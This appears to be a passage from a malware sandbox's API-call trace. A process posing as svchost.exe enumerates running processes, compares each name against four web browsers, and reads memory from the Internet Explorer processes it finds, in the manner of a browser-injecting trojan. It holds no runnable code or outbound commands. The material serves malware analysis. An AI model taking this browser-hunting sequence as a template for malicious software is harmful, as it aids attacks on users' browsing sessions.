	[0240.168] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.169] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0240.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x821c
	[0240.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.170] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0240.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.170] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.171] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0240.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.171] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.171] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0240.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8220
	[0240.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.172] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0240.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.173] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.174] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0240.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.174] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.175] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0240.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8224
	[0240.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.176] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0240.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.176] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.177] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0240.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.177] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.178] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8228
	[0240.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.199] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.200] NtQueryInformationProcess (in: ProcessHandle=0x8228, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.201] ReadProcessMemory (in: hProcess=0x8228, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0240.201] ReadProcessMemory (in: hProcess=0x8228, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0240.201] ReadProcessMemory (in: hProcess=0x8228, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0240.201] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x822c
	[0240.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.202] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.202] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.203] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.203] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.203] NtQueryInformationProcess (in: ProcessHandle=0x822c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.203] ReadProcessMemory (in: hProcess=0x822c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0240.203] ReadProcessMemory (in: hProcess=0x822c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0240.203] ReadProcessMemory (in: hProcess=0x822c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0240.204] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8230
	[0240.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.206] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0240.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8234
	[0240.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.207] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0240.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.207] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.208] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0240.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.208] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8238
	[0240.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.210] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x823c
	[0240.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.212] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.213] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.213] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.214] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8240
	[0240.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.215] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.216] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.216] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.217] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8244
	[0240.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.218] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.218] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.218] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.219] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8248
	[0240.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.220] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.220] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.221] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.221] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x824c
	[0240.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.222] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.223] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.223] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.223] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.223] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0240.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8250
	[0240.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.224] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0240.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.225] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.262] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0240.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.262] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0240.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8254
	[0240.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.263] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.264] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.264] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.264] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0240.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8258
	[0240.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.266] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0240.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.266] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.266] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0240.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.266] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x825c
	[0240.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.267] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.268] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.268] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.268] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0240.269] CloseHandle (hObject=0x4fd0) returned 1
	[0240.269] Sleep (dwMilliseconds=0x64) 
	[0240.387] GetCurrentProcessId () returned 0x110
	[0240.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0240.391] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0240.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0240.392] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0240.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8260
	[0240.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.393] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.393] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.394] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.394] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8264
	[0240.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.395] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.395] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.396] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.396] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0240.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8268
	[0240.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.397] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0240.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.397] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.398] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0240.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.398] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x826c
	[0240.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.399] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.400] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.400] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.400] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0240.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8270
	[0240.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
